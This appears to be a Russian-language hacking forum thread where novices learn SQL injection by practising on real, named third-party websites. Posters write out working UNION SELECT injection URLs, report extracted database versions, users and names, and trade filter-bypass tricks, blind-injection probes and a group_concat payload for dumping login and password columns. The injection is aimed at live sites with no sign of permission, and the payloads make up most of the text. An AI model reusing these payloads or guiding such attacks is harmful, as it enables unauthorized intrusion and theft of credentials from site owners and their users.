Это конечно все правильно спорить не стану но вот для новичков никаких статей или FAQ по которых можно было осваивать на практике инъекции на современных ресурсах я найти не смог. Остается только разве что устанавливать "Denwer" и на localhost-те который ничего не фильтрует практиковать инъекции. Ладно пойду погуглю часок другой может что-небудь и найду достаточно разжеванное для моего уровня познаний P.S.: надеюсь я еще не надоел со своими философствованиями
https://forum.antichat.ru/threadedpost1814768.html#post1814768 Как бэ здесь около 11к постов с SQL Injection, бери любой да копай. Мы сейчас общаемся в теме с отличным FAQ'ом по скулям.
ничего себе. еще никогда не видел чтоб на одну тему приходилось столько страниц. тут же месяцами читать не перечитать
Спасибо за ссылку на список форумов. Но я все же решил воспользоваться твоей добротой и задать несколько (скорее всего глупых) вопросов. Но сначала мои достижения: На https://forum.antichat.ru/threadnav21336-1141-10.html в посте #11404 пишется об http://www.glassdecor.ru http://www.glassdecor.ru/articles/show.php?id=11+order+by+2-- узнал что поля 2 http://www.glassdecor.ru/articles/show.php?id=-11+union+select+1,2-- узнал что выводится второе из них. http://www.glassdecor.ru/articles/show.php?id=11+and+1=0+union+select+1,concat_ws(0x3a,version(),user(),database())-- узнал об версти- 5.0.67, имени пользователи [email protected] и имени БД - glassdecorru_db. На сколько я понимаю функция concat_ws() используется для того чтобы объединить в виде одного параметра (не знаю как это точнее назвать) сразу три функции: version() , user(), database(). А теперь глупые вопросы: 1) http://www.glassdecor.ru/articles/show.php?id=-11+union+select+1,2+from+INFORMATION_SCHEMA.TABLES-- оказался алогичным к http://www.glassdecor.ru/articles/show.php?id=-11+union+select+1,2-- INFORMATION_SCHEMA.TABLES появилась в 5-ой версии а у нас 5.0.67. значит она должна быть. Где я ступил? 2) http://www.glassdecor.ru/articles/show.php?id=-11+union+select+1,2/* почему-то приводит к ошибке. Значит ли это что «/» фильтруется? На сколько я понимаю нет. Потому что http://www.glassdecor.ru/articles/show.php?id=-11/**/union/**/+select/**/+1,2-- срабатывает как надо. А вот почему срабатывает комментарий «--», а при «/*» - ошибка я так и не понял? 3) Первый параметр concat_ws() – «0x3a» это имеется ввиду символ двоеточия «:» Но почему эго надо прописывать кодом а если просто прописать http://www.glassdecor.ru/articles/show.php?id=11+and+1=0+union+select+1,concat_ws,version(),user(),database())-- то приводит к ошибке. Значит ли это что символ двоеточия «:» фильтруется. 4) Что можно делать дальше если использование INFORMATION_SCHEMA.TABLES ни к чему полезному не приводит ? P.S.: Что-то мои посты с каждым разом все длиннее и длиннее. Ctacok надеюсь я тебя ими еще не задолбал. Очень уж хочется освоить эту тему.
Сорри за нубский вопрос.когда я проверяю на уязвимости методом подставления кавычек и всего остального,выкидывает на главную.это как понимать?
спасибо,а если на подставление кавычки и также всего остального вообще ничего не выскакивает кавычка не фильруеццо типа %20 а просто страничка остается такая же то это блайнд?
Зачарь без кавычек. (http://jdstiles.com/java/cct.html) Например: ... WHERE table_name=char(84, 65, 66, 76, 69)/*
Вот несколько вопросов: 1. Вот есть сайт типа "бла-бла.ру/ид1", если я поставлю "ид1’ ", и выдаст ошибку, типа , то что нужно делать дальше? подбирать количество строк? типа: ?, или количество полей? типа: ? 2. И еще, если есть готовая уязвимость например: , что сделать дальше, чтобы попасть в бд?
Перечитал раза три... Я просто не знаю языка sql =(. Но прочитал статью и понял, что можно и без этого)). Так может ответите? Не доходит и все =..(
Оператором order by ты находишь количество полей. Union select 1,2...-ты определяешь принтабельное поле(т.е. то,через которое ты будешь выводить информацию)
Чатсный случай1 Хоть и баян, но Code: _http://www.laptopshowcase.co.uk/downloads.php?id=-1/* Ошибка такого вида: Code: _http://www.laptopshowcase.co.uk/downloads.php?id=-1+group+by+1+union+select+1,2,version(),4,5,6,7,8,9,0,11/* Терерь представляем себе что нет вывода ошибок!
Я правильно понимаю, что в данном случае ничего кроме глобальных переменных вроде USER достать нельзя? Т.е. вытащить что-то из базы не возможно? P.S. В статье опячатка: (id*IF(ASCII(SUBSTRING(USER(),0,1))=113,1,-1)) должно быть (id*IF(ASCII(SUBSTRING(USER(),1,1))=113,1,-1))
Такое маленькое дополнение) group_concat имеет ограничение выводимости данных в 1024 + limit он не поддерживает, что бы обойти его нужно использовать mid К примеру вот так: 587955+union+select+1,2,3,4,5,mid(group_concat(login,char(38),password),600,1024),7,8,9,10,11+from+База.Таблица--